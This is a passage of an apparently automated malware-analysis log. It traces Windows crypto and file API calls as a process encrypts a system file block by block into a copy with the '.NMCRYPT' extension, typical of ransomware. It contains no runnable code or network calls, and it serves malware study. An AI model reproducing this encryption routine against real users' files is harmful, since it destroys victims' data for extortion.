out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.114] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.115] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.115] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.116] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0161.116] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.116] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad5b8) returned 1 [0161.116] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0161.116] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0161.116] wcslen (_String="\\\\?\\") returned 0x4 [0161.116] CryptDuplicateKey (in: hKey=0x9ad5b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad5f8) returned 1 [0161.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0161.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\tr-TR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tr-tr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0161.116] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0161.117] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0161.117] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.118] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.118] GetLastError () returned 0x0 [0161.118] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.159] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.159] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.159] GetLastError () returned 0x0 [0161.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.159] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.159] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.159] GetLastError () returned 0x0 [0161.159] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.159] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.160] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.160] GetLastError () returned 0x0 [0161.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.160] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.160] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.160] GetLastError () returned 0x0 [0161.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.160] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.160] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.160] GetLastError () returned 0x0 [0161.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.160] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.160] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.160] GetLastError () returned 0x0 [0161.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.160] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.160] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.160] GetLastError () returned 0x0 [0161.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.160] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.160] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.160] GetLastError () returned 0x0 [0161.160] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.160] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.160] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.160] GetLastError () returned 0x0 [0161.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.161] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.161] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.161] GetLastError () returned 0x0 [0161.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.161] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.161] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.161] GetLastError () returned 0x0 [0161.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.161] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.161] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.161] GetLastError () returned 0x0 [0161.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.161] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.161] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.161] GetLastError () returned 0x0 [0161.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.161] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.161] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.161] GetLastError () returned 0x0 [0161.161] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.161] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.162] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.162] GetLastError () returned 0x0 [0161.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.162] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.162] CryptEncrypt (in: hKey=0x9ad5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.162] GetLastError () returned 0x0 [0161.162] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.162] ReadFile 